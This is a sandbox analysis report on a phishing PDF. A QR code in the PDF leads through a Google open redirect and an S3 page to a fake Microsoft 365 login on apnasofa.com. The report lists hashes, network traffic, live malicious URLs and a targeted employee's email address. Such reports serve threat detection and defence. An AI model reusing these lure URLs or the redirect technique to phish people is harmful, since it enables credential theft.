Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Employee_Important_Message.pdf

Overview

General Information

Sample name:Employee_Important_Message.pdf
Analysis ID:1565259
MD5:bce83ede925d81678ca16b935128a92f
SHA1:86c99ea9b6a86d7f85ec98a2d6c7e8ac9a618f89
SHA256:4e23522eb1e5fcb1dbaf397d053f51ce1ca81c282fb2020e2c67a4c2b2703ae4
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 3868 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6692 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 5688 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1620 --field-trial-handle=1548,i,4707952982078980515,2940567251321136579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 6528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.lk/url?q=mogrady@hollandco.com&hollandco.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bW9ncmFkeUBob2xsYW5kY28uY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6588 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1996,i,4822762108358950042,13094913143839525268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tSlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://apnasofa.com/episode/style.cssAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/indexAvira URL Cloud: Label: malware
Source: https://apnasofa.com/favicon.icoAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/image/logo.pngAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/script.jsAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/index#Avira URL Cloud: Label: malware

Phishing

barindex
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any known association with Microsoft or its services., The presence of an input field asking for an email address on a non-Microsoft domain is suspicious and indicative of phishing. DOM: 1.0.pages.csv
Source: PDF documentJoe Sandbox AI: PDF document contains QR code
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tJoe Sandbox AI: Page contains button: 'Verify' Source: '1.1.pages.csv'
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tJoe Sandbox AI: Page contains button: 'Verify' Source: '1.2.pages.csv'
Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script contains heavily obfuscated code (base64 encoded) with 'secretkey' variable (+3), uses atob for decoding (+1), likely contains hidden functionality (+2), and the presence of a hardcoded 'secretkey' suggests potential data exfiltration or malicious intent (+2). The obfuscation technique combined with sensitive key handling indicates deliberate attempt to hide functionality.
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: Number of links: 0
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: Title: pleased does not match URL
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No <meta name="copyright".. found
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No <meta name="copyright".. found
Source: https://apnasofa.com/episode/index#bW9ncmFkeUBob2xsYW5kY28uY29tHTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.lk to https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 23.195.76.153 23.195.76.153
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.76.153
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.76.153
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.76.153
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.76.153
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.76.153
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.76.153
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: global trafficHTTP traffic detected: GET /url?q=mogrady@hollandco.com&hollandco.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: google.lkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /url?q=mogrady@hollandco.com&hollandco.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.lkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.lkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=DDeekMNhAIJgi7-FQimRZKHh_SHVXj2ClM4BCrUTOPsJeeLqJ1Ng0eNt7uDjcx6ARg2It0QZzDETItUetVyD-kZOeICtXwpPx0gX02MUCNb41auc_sVTbNPqXqLhu64zqpAUwk2ynse-2ezVpGnIiSO9AQy5sdhJH1eOp-mFlKt3yAsLoMDUCDEn894-yOQRI_VcZA
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /vocabulary.html HTTP/1.1Host: i--iy.s3.us-east-1.amazonaws.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A87pXaBcgMWUtrF&MD=HdDwbW9w HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /episode/index HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://i--iy.s3.us-east-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/style.css HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: google.lk
Source: global trafficDNS traffic detected: DNS query: www.google.lk
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: i--iy.s3.us-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: apnasofa.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ipwhois.app
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 29 Nov 2024 13:30:10 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_145.6.drString found in binary or memory: https://apnasofa.com/episode/index#
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.winPDF@29/53@23/11
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-29 08-29-48-922.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1620 --field-trial-handle=1548,i,4707952982078980515,2940567251321136579,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.lk/url?q=mogrady@hollandco.com&hollandco.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bW9ncmFkeUBob2xsYW5kY28uY29t
